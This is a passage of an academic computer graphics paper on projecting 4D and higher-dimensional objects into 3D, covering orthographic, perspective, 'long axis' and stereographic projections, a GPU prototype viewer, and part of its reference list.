cross-product. Assuming that a point pi in Rn is defined by a tuple of coordinates denoted as (pi0,p i 1,...,p i n−1) and a unit vector along the ith dimension is denoted as x̂i, the n-dimensional cross-product EN of a set of points p0,p1,...,pn−1 can be expressed compactly as the cofactors of the last column in the following determinant: EN = ∣∣∣∣∣∣∣∣∣∣ (p10−p 0 0) (p 2 0−p 0 0) ··· (p n−1 0 ) x̂0 (p11−p 0 1) (p 2 1−p 0 1) ··· (p n−1 1 ) x̂1 ... ... ... ... ... (p1n−1−p 0 n−1) (p 2 n−1−p 0 n−1) ··· (p n−1 n−1) x̂n−1. ∣∣∣∣∣∣∣∣∣∣ Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 5/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 The components of the normal vector EN are thus given by the minors of the unit vectors x̂0,x̂1,...,x̂n−1. This vector EN–like all other vectors—can be normalised into a unit vector by dividing it by its norm ( EN ) . Previous work on the visualisation of higher-dimensional objects There is a reasonably extensive body of work on the visualisation of 4D and nD objects, although it is still more often used for its creative possibilities (e.g., making nice-looking graphics) than for practical applications. In literature, visual metaphors of 4D space were already described in the 1880 sin Flatland: A Romance of Many Dimensions (Abbott, 1884) and A New Era of Thought (Hinton, 1888). Other books that treat the topic intuitively include Beyond the Third Dimension: Geometry, Computer Graphics, and Higher Dimensions (Banchoff, 1996) and The Visual Guide To Extra Dimensions: Visualizing The Fourth Dimension, Higher-Dimensional Polytopes, And Curved Hypersurfaces (McMullen, 2008). In a more concrete computer graphics context, already in the 1960s, Noll (1967) described a computer implementations of the 4D to 3D perspective projection and its application in art (Noll, 1968). Beshers & Feiner (1988) describe a system that displays animating (i.e. continuously transformed) 4D objects that are rendered in real-time and use colour intensity to provide a visual cue for the 4D depth. It is extended to n dimensions by Feiner & Beshers (1990). Banks (1992) describes a system that manipulates surfaces in 4D space. It describes interaction techniques and methods to deal with intersections, transparency and the silhouettes of every surface. Hanson & Cross (1993) describes a high-speed method to render surfaces in 4D space with shading using a 4D light and occlusion, while Hanson (1994) describes much of the mathematics that are necessary for nD visualisation. A more practical implementation is described in Hanson, Ishkov & Ma (1999). Chu et al. (2009) describe a system to visualise 2-manifolds and 3-manifolds embedded in 4D space and illuminated by 4D light sources. Notably, it uses a custom rendering pipeline that projects tetrahedra in 4D to volumetric images in 3D—analogous to how triangles in 3D that are usually projected to 2D images. A different possible approach lies in using meaningful 3D cross-sections of a 4D dataset. For instance, Kageyama (2016) describes how to visualise 4D objects as a set of hyperplane slices. Bhaniramka, Wenger & Crawfis (2000) describe how to compute isosurfaces in dimensions higher than three using an algorithm similar to marching cubes. D’Zmura, Colantoni & Seyranian (2000) describe a system that displays 3D cross-sections of a 4D virtual world one at a time. Similar to the methods described above, Hollasch (1991) gives a simple formulation to describe the 4D to 3D projections, which is itself based on the 3D to 2D orthographic and perspective projection methods described by Foley & Nielson (1992). This is the method that we extend to define n-dimensional versions of these projections and is thus explained in greater detail below. The mathematical notation is however changed slightly so as to have a cleaner extension to higher dimensions. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 6/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 In order to apply the required transformations, Hollasch (1991) first defines a point from∈R4 where the viewer (or camera) is located, a point to∈R4 that the viewer directly points towards, and a set of two vectors −→ up and−−→over. Based on these variables, he defines a set of four unit vectors â, b̂, ĉ and d̂ that define the axes of a 4D coordinate system centred at the from point. These are ensured to be orthogonal by using the 4D cross-product to compute them, such that: d̂ = to−from ‖to−from‖ â= up×over×d̂ ‖up×over×d̂‖ b̂= over×d̂×â ‖over×d̂×â‖ ĉ = d̂×â×b̂. Note two aspects in the equations above: (i) that the input vectors −→ up and −−→over are left unchanged (i.e., b̂= −→ up and ĉ =−−→over) if they are already orthogonal to each other and orthogonal to the vector from from to to (i.e., to−from), and (ii) that the last vector ĉ does not need to be normalised since the cross-product already returns a unit vector. These new unit vectors can then be used to define a transformation matrix to transform the 4D coordinates into a new set of points E (as in eye coordinates) with a coordinate system with the viewer at its centre and oriented according to the unit vectors. The points are given by: E = [ P−from ][ â b̂ ĉ d̂ ] . For an orthographic projection given E =[e0 e1e2 e3], the first three columns e0, e1 and e2 can be used as-is, while the fourth column e3 defines the orthogonal distance to the viewer (i.e., the depth). Finally, in order to obtain a perspective projection, he scales the points inwards in direct proportion to their depth. Starting from E, he computes E′=[e′0 e ′ 1e ′ 2 e ′ 3] as: e′0= e0 e3 tanϑ/2 e′1= e1 e3 tanϑ/2 e′2= e2 e3 tanϑ/2 e′3=e3. Where ϑ is the viewing angle between x and the line between the from point and every point as shown in Fig. 2. A similar computation is done for y and z. In E′, the first three columns (i.e., e′0, e ′ 1 and e ′ 2) similarly give the 3D coordinates for a perspective projection of the 4D points while the fourth column is also the depth of the point. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 7/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 Figure 2 The geometry of a 4D perspective projection along the x axis for a point p. By analysing the depth along the depth axis given by e3, it is possible to see that the coordinates of the point along the x axis, given by e0, are scaled inwards in order to obtain e′0 based on the viewing angle ϑ. Note that x̂n−1 is an arbitrary viewing hyperplane and another value can be used just as well. METHODOLOGY We present here three different projections from Rn to Rn−1 which can be applied iteratively to bring objects of any dimension down to 3D for display. We three projections that are reasonably intuitive in 4D to 3D: a ‘long axis’ projection that puts 3D objects side by side, the orthographic and perspective projections that work in the same way as their 3D to 2D ana- logues, and a projection to an (n−1)-sphere followed by a stereographic projection to Rn−1. ‘Long axis’ projection First we aim to replicate the idea behind the example previously shown in Fig. 1—a series of 3D objects that are shown next to each other, seemingly projected separately with the correspondences across scale or time shown as long edges (as in Fig. 1) or faces connecting the 3D objects. Edges would join correspondences between vertices across the models, while faces would join correspondences between elements of dimension up to one (e.g. a pair of edges, or an edge and a vertex). Since every 3D object is apparently projected separately using a perspective projection to 2D, it is thus shown in the same intuitive way in which a single 3D object is projected down to 2D. The result of this projection is shown in Fig. 3 for the model previously shown in Figs. 1 and in 4 for a 4D model using 3D space with time. Although to the best of our knowledge this projection does not have a well-known name, it is widely used in explanations of 4D and nD geometry—especially when drawn by hand or when the intent is to focus on the connectivity between different elements. For instance, it is usually used in the typical explanation for how to construct a tesseract, i.e., a 4-cube or the 4D analogue of a 2D square or 3D cube, which is based on drawing two cubes and connecting the corresponding vertices between the two (Fig. 5). Among other examples in the scientific literature, this kind of projection can be seen in Fig. 2 in Yau & Srihari (1983), Fig. 3.4 in Hollasch (1991), Fig. 3 in Banchoff & Cervone (1992), Figs. 1–4 in Arenas & Pérez-Aguila (2006), Fig. 6 in Grasset-Simon, Damiand & Lienhardt (2006), Fig. 1 in Paul (2012) and Fig. 16 in Van Oosterom & Meijers (2014). Conceptually, describing this projection from n to n−1 dimensions, which we hereafter refer to as a ‘long axis’ projection, is very simple. Considering a set of points P in Rn, the projected set of points P′ in Rn−1 is given by taking the coordinates of P for the Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 8/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 (A) (B) (C) Figure 3 A model of a 4D house similar to the example shown previously in Fig. 1, here including also a window and a door that are collapsed to a vertex in the 3D object at the lower level of detail. (A) shows the two 3D objects positioned as in Fig. 1, (B) rotates these models 90◦ so that the front of the house is on the right, and (C) orients the two 3D objects front to back. Many more interesting views are possible, but these show the correspondences particularly clearly. Unlike the other model, this one was generated with 4D coordinates and projected using our prototype that applies the projection described in this sec- tion. (A) (B) Figure 4 We take (A) a simple 3D model of two buildings connected by an elevated corridor, and model it in 4D such that the two buildings exist during a time interval [−1,1]and the corridor only exists during [−0.67,0.67], resulting in (B) a 4D model shown here in a ‘long axis’ projection. The two buildings are shown in blue and green for clarity. Note how this model shows more saturated colours due to the higher number of faces that overlap in it. Figure 5 The typical explanation for how to draw the vertices and edges in an i-cube. Starting from a single vertex representing a point (i.e. a 0-cube), an (i+1)-cube can be created by drawing two i-cubes and connecting the corresponding vertices of the two. Image by Wikimedia user NerdBoy1392 (retrieved from https://commons.wikimedia.org/wiki/File:Dimension_levels.svg under a CC BY-SA 3.0 license). Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 9/22 https://peerj.com https://commons.wikimedia.org/wiki/File:Dimension_levels.svg http://dx.doi.org/10.7717/peerj-cs.123 (D) (E) (F) (A) (B) (C) Figure 6 (A–C) The 4D house model and (D–F) the two buildings model projected down to 3D using an orthographic projection. The different views are obtained by applying different rotations in 4D. The less and more detailed 3D models can be found by looking at where the door and window are collapsed. first n−1 axes and adding to them the last coordinate of P which is spread over all coordinates according to weights specified in a customisable vector x̂n. For instance, Fig. 3 uses x̂n =[2 0 0], resulting in 3D models that are 2 units displaced for every unit in which they are apart along the n-th axis. In matrix form, this kind of projection can then be applied as P′=P[I x̂n]. Orthographic and perspective projections Another reasonably intuitive pair of projections are the orthographic and perspective projections from nD to (n−1)D. These treat all axes similarly and thus make it more difficult to see the different (n−1)-dimensional models along the n-th axis, but they result in models that are much less deformed. Also, as shown in the 4D example in Fig. 6, it is easy to rotate models in such a way that the corresponding features are easily seen. Based on the description of 4D-to-3D orthographic and perspective projection described from Hollasch (1991), we here extend the method in order to describe the n-dimensional to ( n−1)-dimensional case, changing some aspects to give a clearer geometric meaning for each vector. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 10/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 2Visual cues can still be useful in higher dimensions. See http://eusebeia.dyndns. org/4d/vis/08-hsr. Similarly, we start with a point from∈Rn where the viewer is located, a point to∈Rn that the viewer directly points towards (which can be easily set to the centre or centroid of the dataset), and a set of n−2 initial vectors−→v 1,..., −→v n−2 in Rn that are not all necessarily orthogonal but nevertheless are linearly independent from each other and from the vector to− from. In this setup, the −→v i vectors serve as a base to define the orientation of the system, much like the traditional −→ up vector that is used in 3D to 2D projections and the −−→over vector described previously. From the above mentioned variables and using the nD cross-product, it is possible to define a new set of orthogonal unit vectors x̂0,...,x̂n−1 that define the axes x0,...,xn−1 of a coordinate system in Rn as: x̂n−1= to−from ‖to−from‖ x̂0= −→v 1×···× −→v n−2×x̂n−1 ‖ −→v 1×···× −→v n−2×x̂n−1‖ x̂i= −→v i+1×···× −→v n−2×x̂n−1×x̂0×···×x̂i−1 ‖ −→v i+1×···× −→v n−2×x̂n−1×x̂0×···×x̂i−1‖ x̂n−2= x̂n−1×x̂0×···×x̂n−2. The vector x̂n−1 is the first that needs to be computed and is oriented along the line from the viewer (from) to the point that it is oriented towards (to). Afterwards, the vectors are computed in order from x̂0 to x̂n−2 as normalised n-dimensional cross products of n−1 vectors. These contain a mixture of the input vectors −→v 1,..., −→v n−2 and the computed unit vectors x̂0,...,x̂n−1, starting from n−2 input vectors and one unit vector for x̂0, and removing one input vector and adding the previously computed unit vector for the next x̂i vector. Note that if−→v 1,..., −→v n−2 and x̂n−1 are all orthogonal to each other,∀0< i<n−1, x̂i is simply a normalised −→v i. Like in the previous case, the vectors x̂0,...,x̂n−1 can then be used to transform an m×n matrix of m nD points in world coordinates P into an m×n matrix of mnD points in eye coordinates E by applying the following transformation: E = [ P−from ][ x̂0 ··· x̂n−1 ] . As before, if E has rows of the form [e0 ··· en−1] representing points, e0,...,en−2 are directly usable as the coordinates in Rn−1 of the projected point in an n-dimensional to (n−1)-dimensional orthographic projection, while en−1 represents the depth, i.e. the distance between the point and the projection (n−1)-dimensional subspace, which can be used for visual cues2 . The coordinates along e0,...,en−2 could be made to fit within a certain bounding box by computing their extent along each axis, then scaling appropriately using the extent that is largest in proportion to the extent of the bounding box’s corresponding axis. For an n-dimensional to (n−1)-dimensional perspective projection, it is only necessary to compute the distance between a point and the viewer along every axis by taking into account the viewing angleϑ between x̂n−1 and the line between the to point and every point. Intuitively, this means that if an object is n times farther than another identical object, it Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 11/22 http://eusebeia.dyndns.org/4d/vis/08-hsr http://eusebeia.dyndns.org/4d/vis/08-hsr https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 Figure 7 The geometry of an nD perspective projection for a point p. By analysing each axis x̂i (∀0 ≤ i < n−1) independently together with the final axis x̂n−1, it is possible to see that the coordinates of the point along that axis, given by ei, are scaled inwards based on the viewing angle ϑ. (A) (B) Figure 8 A polyhedron and a polychoron in Jenn 3D: (A) a cube and (B) a 24-cell. is depicted n times smaller, or 1n of its size. This situation is shown in Fig. 7 and results in new e′0,...,e ′ n−2 coordinates that are shifted inwards. The coordinates are computed as: e′i = ei en−1tanϑ/2 , for 0≤ i≤n−2. The (n−1)-dimensional coordinates generated by this process can then be recursively projected down to progressively lower dimensions using this method. The objects represented by these coordinates can also be discretised into images of any dimension. For instance, Hanson (1994) describes how to perform many of the operations that would be required, such as dimension-independent clipping tests and ray-tracing methods. Stereographic projection A final projection possibility is to apply a stereographic projection from Rn to Rn−1, which for us was partly inspired by Jenn 3D (http://www.math.cmu.edu/~fho/jenn/) (Fig. 8). This program visualises polyhedra and polychora embedded in R4 by first projecting them Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 12/22 https://peerj.com http://www.math.cmu.edu/~fho/jenn/ http://dx.doi.org/10.7717/peerj-cs.123 3Intuitively, an unbounded volume that wraps around itself, much like a 2-sphere can be seen as an unbounded surface that wraps around itself. inwards/outwards to the volume of a 3-sphere3 and then projecting them stereographically to R3, resulting in curved edges, faces and volumes. In a dimension-independent form, this type of projection can be easily done by considering the angles ϑ0,...,ϑn−2 in an n-dimensional spherical coordinate system. Steeb (2011, §12.2) formulates such a system as: r = √ x20 +···+x 2 n−1 ϑi=cos −1   xi√ r2− ∑i−1 j=0x 2 j  , for 0≤ i<n−2 ϑn−2= tan −1 ( xn−1 xn−2 ) . It is worth to note that the radius r of such a coordinate system is a measure of the depth with respect to the projection (n−1)-sphere Sn−1 and can be used similarly to the previous projection examples. The points can then be converted back into points on the surface of an (n−1)-sphere of radius 1 by making r =1 and applying the inverse transformation. Steeb (2011, §12.2) formulates it as: xi=rcos ϑi i−1∏ j=0 sin ϑj, for 0≤ i<n−2 xn−1=r n−2∏ j=0 sin ϑj. The next step, a stereographic projection, is also easy to apply in higher dimensions, mapping an (n+1)-dimensional point x = (x0,...,xn) on an n-sphere Sn to an n- dimensional point x′=(x0,...,xn−1) in the n-dimensional Euclidean space Rn. Chisholm (2000) formulates this projection as: x′i = xi xn−1 , for 0≤ i<n. The stereographic projection from nD to (n−1)D is particularly intuitive because it results in the n-th axis being converted into an inwards-outwards axis. As shown in Fig. 9, when it is applied to scale, this results in models that decrease or increase in detail as one moves inwards or outwards. The case with time is similar: as one moves inwards/outwards, it is easy to see the state of a model at a time before/after. RESULTS We have implemented a small prototype for an interactive viewer of arbitrary 4D objects that performs the three projections previously described. It was used to generate Figs. 3, 6 and 9, which were obtained by moving around the scene, zooming in/out and capturing screenshots using the software. The prototype was implemented using part of the codebase of azul (https://github.com/tudelft3d/azul) and is written in a combination of Swift 3 and Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 13/22 https://peerj.com https://github.com/tudelft3d/azul http://dx.doi.org/10.7717/peerj-cs.123 (A) (B) Figure 9 (A) The 4D house model and (B) the two buildings model projected first inwards/outwards to the closest point on the 3-sphere S3 and then stereographically to R3. The round surfaces are ob- tained by first refining every face in the 4D models. C++11 using Metal—a low-level and low-overhead graphics API—under macOS 10.12 (https://developer.apple.com/metal/). By using Metal, we are able to project and display objects with several thousand polygons with minimal visual lag on a standard computer. Its source code is available under the GPLv3 licence at https://github.com/kenohori/azul4d. We take advantage of the fact that the Metal Shading Language—as well as most other linear algebra libraries intended for computer graphics—has appropriate data structures for 4D geometries and linear algebra operations with vectors and matrices of size up to four. While these are normally intended for use with homogeneous coordinates in 3D space, they can be used to do various operations in 4D space with minor modifications and by reimplementing some operations. Unfortunately, this programming trick also means that extending the current prototype to dimensions higher than four requires additional work and rather cumbersome programming. However, implementing these operations in a dimension-independent way is rather not difficult outside in a more flexible programming environment. For instance, Fig. 10 shows how a double stereographic projection can be used to reduce the dimensionality of an object from 5D to 3D. This figure was generated in a separate C++ program which exports its results to an OBJ file. The models were afterwards rendered in Blender (https://www.blender.org). In our prototype, we only consider the vertices, edges and faces of the 4D objects, as the higher-dimensional 3D and 4D primitives—whose 0D, 1D and 2D boundaries are however shown—would readily obscure each other in any sort of 2D or 3D visualisation (Banks, 1992). Every face of an object is thus stored as a sequence of vertices with coordinates in R4 and is appended with an RGBA colour attribute with possible transparency. The alpha value of each face is used see all faces at once, as they would otherwise overlap with each other on the screen. The 4D models were manually constructed based on defining their vertices with 4D coordinates and their faces as successions of vertices. In addition to the 4D house previously Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 14/22 https://peerj.com https://developer.apple.com/metal/ https://github.com/kenohori/azul4d https://www.blender.org http://dx.doi.org/10.7717/peerj-cs.123 4This is sufficient for our purposes, but other applications would need to find three linearly-independent points or to use a more computationally expensive method that finds the best fitting plane for the face. 5An alternative would be to embed these in 4D from the beginning, but it would result in distorted shapes depending on their position and orientation due to the extra degrees of rotational freedom in R4. (A) (B) Figure 10 (A) A stereographic projection of a 4-orthoplex and (B) a double stereographic projection of a 5-orthoplex. The family of orthoplexes contains the analogue shapes of a 2D square or a 3D octahedron. shown, we built a simpler tesseract for testing. As built, the tesseract consists of 16 vertices and 24 vertices, while the 4D house consists of 24 vertices and 43 faces. However, we used the face refining process described below to test our prototype with models with up to a few thousand faces. Once created, the models were still displayed and manipulated smoothly. To start, we preprocess a 4D model by triangulating and possibly refining each face, which makes it possible to display concave faces and to properly see the curved shapes that are caused by the stereographic projection previously described. For this, we first compute the plane passing through the first three points of each face4 and project each point from R4 to a new coordinate system in R2 on the plane. We then triangulate and refine separately each face in R2 with the help of a few packages of the Computational Geometry Algorithms Library (CGAL) (http://www.cgal.org), and then we reproject the results back to the previously computed plane in R4. We then use a Metal Shading Language compute shader—a technique to perform general-purpose computing on graphics processing units (GPGPU)—in order to apply the desired projection from R4 to R3. The three different projections presented previously are each implemented as a compute shader. By doing so, it is easier to run them as separate computations outside the graphics pipeline, to then extract the projected R3 vertex coordinates of every face and use them to generate separate representations of their bounding edges and vertices5 . Using their projected coordinates in R3, the edges and vertices surrounding each face are thus displayed respectively as possibly refined line segments and as icosahedral approximations of spheres (i.e., icospheres). Finally, we use a standard perspective projection in a Metal vertex shader to display the projected model with all its faces, edges and vertices. We use a couple of tricks in order to keep the process fast and as parallel as possible: separate threads for each CPU process (the generation of the vertex and edge geometries and the modification of the projection matrices according to user interaction) and GPU process (4D-to-3D projection and 3D-to-2D projection for display), and blending with order-independent transparency Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 15/22 https://peerj.com http://www.cgal.org http://dx.doi.org/10.7717/peerj-cs.123 without depth checks. For complex models, this results in a small lag where the vertices and edges move slightly after the faces. In the current prototype, we have implemented a couple functions to interact with the model: rotations in 4D and translations in 3D. In 4D, the user can rotate the model around the six possible rotation planes by clicking and dragging while pressing different modifier keys. In 3D, it is possible to move a model around using 2D scrolling on a touchpad to shift it left/right/up/down and using pinch gestures to shift it backward/forward (according to the current view). DISCUSSION AND CONCLUSIONS Visualising complete 4D and nD objects projected to 3D and displayed in 2D is often unintuitive, but it enables analysing higher-dimensional objects in a thorough manner that cross-sections do not. The three projections we have shown here are nevertheless reasonably intuitive due to their similarity to common projections from 3D to 2D, the relatively small distortions in the models and the existence of a clear fourth axis. They also have a dimension-independent formulation. There are however many other types of interesting projections that can be defined in any dimension, such as the equirectangular projection where evenly spaced angles along a rotation plane can be directly converted into evenly spaced coordinates—in this case covering 180◦ vertically and 360◦ horizontally. Extending such a projection to nD would result in an n-orthotope, such as a (filled) rectangle in 2D or a cuboid (i.e., a box) in 3D. By applying the projections shown in this paper to 4D objects depicting 3D objects that change in time or scale, it is possible to see at once all correspondences between different elements of the 3D objects and the topological relationships between them. Compared to other 4D visualisation techniques, we opt for a rather minimal approach without lighting and shading. In our application, we believe that this is optimal due to better performance and because it makes for simpler-looking and more intuitive output. In this manner, progressively darker shades of a colour are a good visual cue for the number of faces of the same colour that are visually overlapping at any given point. Since we apply the projection from 4D to 3D in the GPU, it is not efficient to extract the surfaces again in order to compute the 3D normals required for lighting in 3D, while lighting in 4D results in unintuitive visual cues. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research is supported by the Dutch Technology Foundation STW, which is part of the Netherlands Organisation for Scientific Research (NWO), and which is partly funded by the Ministry of Economic Affairs (Project code: 11300). This project has received funding from the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 677312 UMnD). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 16/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 Grant Disclosures The following grant information was disclosed by the authors: Dutch Technology Foundation STW. Netherlands Organisation for Scientific Research (NWO). European Union’s Horizon 2020 research and innovation programme: 677312 UMnD. Ministry of Economic Affairs: 11300. Competing Interests The authors declare there are no competing interests. Author Contributions • Ken Arroyo Ohori conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Hugo Ledoux and Jantien Stoter analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/kenohori/azul4d. REFERENCES Abbott EA. 1884. Flatland: a romance of many dimensions. London: Seely & Co. Abiteboul S, Hull R. 1987. Update propagation in the IFO database model. In: Ghosh SP, Kambayashi Y, Tanaka K, eds. Foundations of data organization. New York: Springer US, 319–331. Arenas Y, Pérez-Aguila R. 2006. Visualizing 3D projections of higher dimensional polytopes: an approach linking art and computers. In: Memorias del Cuarto Congreso Nacional de Ciencias de la Computacion. Armstrong MP. 1988. Temporality in spatial databases. In: GIS/LIS’88: proceedings: accessing the world: third annual International Conference, Exhibits, and Workshops. Bethesda: American Society for Photogrammetry and Remote Sensing, 880–889. Arroyo Ohori K. 2016. Higher-dimensional modelling of geographic information. PhD thesis, Delft University of Technology. Arroyo Ohori K, Boguslawski P, Ledoux H. 2013. Representing the dual of objects in a four-dimensional GIS. In: Abdul Rahman A, Boguslawski P, Gold C, Said M, eds. Developments in multidimensional spatial data models. Lecture notes in geoinformation and cartography, Berlin, Heidelberg: Springer, 17–31. Arroyo Ohori K, Damiand G, Ledoux H. 2014. Constructing an n-dimensional cell complex from a soup of (n-1)-dimensional faces. In: Gupta P, Zaroliagis C, eds. applied algorithms. First international conference, ICAA 2014, Kolkata, India, January 13–15, 2014. Proceedings. Lecture notes in computer science, vol. 8321. Kolkata: Springer International Publishing Switzerland, 37–48. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 17/22 https://peerj.com https://github.com/kenohori/azul4d http://dx.doi.org/10.7717/peerj-cs.123 Arroyo Ohori K, Ledoux H, Biljecki F, Stoter J. 2015a. Modelling a 3D city model and its levels of detail as a true 4D model. ISPRS International Journal of Geo-Information 4(3):1055–1075 DOI 10.3390/ijgi4031055. Arroyo Ohori K, Ledoux H, Stoter J. 2015b. An evaluation and classification of nD topological data structures for the representation of objects in a higher-dimensional GIS. International Journal of Geographical Information Science 29(5):825–849 DOI 10.1080/13658816.2014.999683. Arroyo Ohori K, Ledoux H, Stoter J. 2015c. Storing a 3D city model, its levels of detail and the correspondences between objects as a 4D combinatorial map. In: Rahman AA, Isikdag U, Castro FA, eds. Joint international geoinformation conference 2015, 28–30 October 2015, Kuala Lumpur, Malaysia. ISPRS annals of the photogrammetry, remote sensing and spatial information sciences, vol. II–2/W2. Kuala Lumpur: ISPRS, 1–8. Arroyo Ohori K, Ledoux H, Stoter J. 2017. Modelling and manipulating spacetime objects in a true 4D model. Journal of Spatial Information Science 14:61–93. Ballard DH. 1981. Strip trees: a hierarchical representation for curves. Communications of the ACM 24(5):310–321 DOI 10.1145/358645.358661. Banchoff T, Cervone DP. 1992. Illustrating beyond the third dimension. Leonardo 25(3– 4):273–280 DOI 10.2307/1575850. Banchoff TF. 1996. Beyond the third dimension: geometry, computer graphics, and higher dimensions. New York: Scientific American Library Series. Banks D. 1992. Interactive manipulation and display of surfaces in four dimensions. In: I3D’92 proceedings of the 1992 symposium on interactive 3D graphics. ACM, 197–207. Beshers CM, Feiner SK. 1988. Real-time 4D animation on a 3D graphics workstation. In: Graphics interface’88. Edmonton: CHCCS/SCDHM, 1–7. Bhaniramka P, Wenger R, Crawfis R. 2000. Isosurfacing in higher dimensions. In: VIS’00 proceedings of the conference on visualization’00. Piscataway: IEEE. Bieri H, Nef W. 1988. Elementary set operations with d-dimensional polyhedra. In: Noltemeier H, ed. Computational geometry and its applications. Lecture notes in computer science, vol. 333. Berlin, Heidelberg: Springer, 97–112. Brisson E. 1993. Representing geometric structures in d dimensions: topology and order. Discrete & Computational Geometry 9:387–426 DOI 10.1007/BF02189330. Buttenfield BP, DeLotto JS. 1989. Multiple representations: scientific report for the specialist meeting. Technical Report 89–3. Santa Barbara: National Center for Geographic Information and Analysis. Chisholm M. 2000. The sphere in three dimensions and higher: generalizations and special cases. Available at https://theory.org/geotopo/3-sphere/3-sphere.ps. Chrisman NR. 1983. The role of quality information in the long-term functioning of a geographic information system. Cartographica. Chu A, Fu C-W, Hanson AJ, Heng P-A. 2009. GL4D: a GPU-based architecture for interactive 4D visualization. In: IEEE transactions on visualization and computer graphics. D15. Piscataway: IEEE, 1587–1594. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 18/22 https://peerj.com http://dx.doi.org/10.3390/ijgi4031055 http://dx.doi.org/10.1080/13658816.2014.999683 http://dx.doi.org/10.1145/358645.358661 http://dx.doi.org/10.2307/1575850 http://dx.doi.org/10.1007/BF02189330 https://theory.org/geotopo/3-sphere/3-sphere.ps http://dx.doi.org/10.7717/peerj-cs.123 Čomić L, De Floriani L. 2012. Modeling and manipulating cell complexes in two, three and higher dimensions. Lecture notes in computational vision and biomechanics, vol. 2 Dordrecht: Springer, 109–144, chapter 4. Descartes R. 1637. Discours de la méthode. Leyde: Jan Maire. D’Zmura M, Colantoni P, Seyranian G. 2000. Virtual environments with four or more spatial dimensions. Presence 9(6):616–631 DOI 10.1162/105474600300040411. Elduque A. 2004. Vector cross products. Talk presented at the Seminario Rubio de Francia of the Universidad de Zaragoza on April 1, 2004. Available at http://www. unizar.es/matematicas/algebra/elduque/Talks/crossproducts.pdf . Feiner S, Beshers C. 1990. Visualizing n-dimensional virtual worlds with n-vision. In: Proceedings of the 1990 symposium on Interactive 3D graphics. ACM, 37–38. Filho WC, De Figueiredo LH, Gattass M, Carvalho PC. 1995. A topological data struc- ture for hierarchical planar subdivisions. Technical report CS-95-53. Department of Computer Science, University of Waterloo. Foley JD, Van Dam A, Feiner SK, Hughes JF. 1995. Computer graphics: principles and practice in C. Boston: Addison-Wesley Professional. Foley TA, Nielson GM. 1992. Practical techniques for producing 3D graphical images. In: Black J, ed. The System Engineer’s handbook: a guide to building VMEbus and VXIbus systems. San Diego: Academic Press, 223–237, chapter 19. Frank AU. 2014. Four-dimensional representation in human cognition and difficulties with demonstrations: a commentary on wang. Spatial Cognition & Computation 14:114–120 DOI 10.1080/13875868.2014.885526. Friis-Christensen A, Jensen CS. 2003. Object-relational management of multiply represented geographic entities. In: Proceedings of the 15th international conference on scientific and statistical database management. Piscataway: IEEE Computer Society, 150–159. Grafarend EW, You R-J. 2014. Map projections: cartographic information systems. Berlin, Heidelberg: Springer-Verlag. Grasset-Simon C, Damiand G, Lienhardt P. 2006. nD generalized map pyramids: definition, representations and basic operations. Pattern Recognition 39(4):527–538 DOI 10.1016/j.patcog.2005.10.004. Gröger G, Kolbe TH, Nagel C, Häfele K-H. 2012. OGC City Geography Markup Lan- guage (CityGML) encoding standard. Version 2.0.0. Open Geospatial Consortium. Guibas LJ, Stolfi J. 1985. Primitives for the manipulation of general subdivisions and the computation of Voronoi diagrams. ACM Transactions on Graphics 4(2):74–123 DOI 10.1145/282918.282923. Günther O. 1988. The arc tree: an approximation scheme to represent arbitrary curved shapes. In: Efficient structures for geometric data management. Lecture notes in computer science, vol. 337 Berlin, Heidelberg: Springer, 85–121, chapter 37. Güting RH, Böhlen MH, Erwig M, Jensen CS, Lorentzos NA, Schneider M, Vazirgiannis M. 2000. A foundation for representing and querying moving objects. ACM Transactions on Database Systems 25(1):1–42 DOI 10.1145/352958.352963. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 19/22 https://peerj.com http://dx.doi.org/10.1162/105474600300040411 http://www.unizar.es/matematicas/algebra/elduque/Talks/crossproducts.pdf http://www.unizar.es/matematicas/algebra/elduque/Talks/crossproducts.pdf http://dx.doi.org/10.1080/13875868.2014.885526 http://dx.doi.org/10.1016/j.patcog.2005.10.004 http://dx.doi.org/10.1145/282918.282923 http://dx.doi.org/10.1145/352958.352963 http://dx.doi.org/10.7717/peerj-cs.123 Hägerstrand T. 1970. What about people in regional science? Papers of the Regional Science Association 24(1):6–21 DOI 10.1007/BF01936872. Hamre T, Mughal KA, Jacob A. 1997. A 4D marine data model: design and application in ice monitoring. Marine Geodesy 20(2–3):121–136 DOI 10.1080/01490419709388100. Hansen HØ, Christensen NJ. 1993. A Model for n-dimensional boundary 